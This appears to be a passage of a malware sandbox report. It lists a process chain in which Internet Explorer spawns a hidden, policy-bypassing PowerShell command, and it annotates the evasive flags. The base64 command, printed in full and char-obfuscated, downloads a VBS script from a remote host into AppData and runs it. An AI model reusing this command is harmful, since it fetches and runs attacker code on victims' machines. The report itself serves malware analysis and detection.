CAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== " | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" "/C powERsheLL.ExE -EX BypaSS -NOp -W HiDdEN -eC IAAJAAkACQAJAFsATgBlAHQALgBzAEUAUgBWAGkAYwBlAHAAbwBpAE4AVABNAGEAbgBhAEcARQBSAF0AOgA6AHMARQBjAFUAUgBJAHQAWQBwAHIATwB0AE8AYwBPAEwAIAAgACAAIAAgACAAIAA9ACAACQAgAAkACQAgAAkACQAgAAkAIAAgAFsAbgBlAFQALgBTAEUAQwBVAFIAaQBUAFkAcAByAE8AdABPAEMATwBsAHQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdwBHAGUAVAAgACAAIAAoAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAwADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADIAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQAOQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQA3ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADYAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAyACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQByAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADQAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA1ADUAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADUAMwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMQA5ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADAANQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADAAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABhAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADEAMAAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAMQAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAMQAxADkAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAEMASABBAFIAXQAgAAkAIAAgACAACQAJAAkAIAAJADQANwAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBoAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANQAwACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA0ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMAaABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcAMgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAEEAcgBdACAACQAgACAAIAAJAAkACQAgAAkAOAA0ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAGgAQQBSAF0AIAAJACAAIAAgAAkACQAJACAACQA3ADcAIAAJACAAIAAgAAkACQAJACAACQAgAAkAIAAgACAACQAJAAkAIAAJACsAIAAJACAAIAAgAAkACQAJACAACQBbAGMASABBAHIAXQAgAAkAIAAgACAACQAJAAkAIAAJADcANgAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAYwBIAGEAcgBdACAACQAgACAAIAAJAAkACQAgAAkANAA2ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBDAGgAYQBSAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEAOAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAgACAAIAAJAAkACQAgAAkAKwAgAAkAIAAgACAACQAJAAkAIAAJAFsAQwBIAGEAUgBdACAACQAgACAAIAAJAAkACQAgAAkAOQA4ACAACQAgACAAIAAJAAkACQAgAAkAIAAJACAAIAAgAAkACQAJACAACQArACAACQAgACAAIAAJAAkACQAgAAkAWwBjAEgAYQByAF0AIAAJACAAIAAgAAkACQAJACAACQAxADEANQAgAAkAIAAgACAACQAJAAkAIAAJACkAIAAJAAkAIAAgAAkAIAAgACAACQAJAAkAIAAJACAACQAJAC0AbwB1AHQARgBpAGwAZQAgACAACQAJACAAIAAJACAACQAJAB0gJABFAG4AVgA6AEEAcABwAEQAYQB0AEEAXABIAFQATQBMAC4AdgBiAHMAHSAgACAACQAJACAACQAgACAACQAgACAACQAJACAACQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAdABBAFIAVAAgACAAIAAgACAAIAAgACAAHSAkAEUAbgB2ADoAQQBQAFAARABhAFQAYQBcAEgAVABNAEwALgB2AGIAcwAdIA== " | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\HTML.vbs |
option | -ex bypass | value | Attempts to bypass execution policy | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -ex bypass | value | Attempts to bypass execution policy | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -ex bypass | value | Attempts to bypass execution policy | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |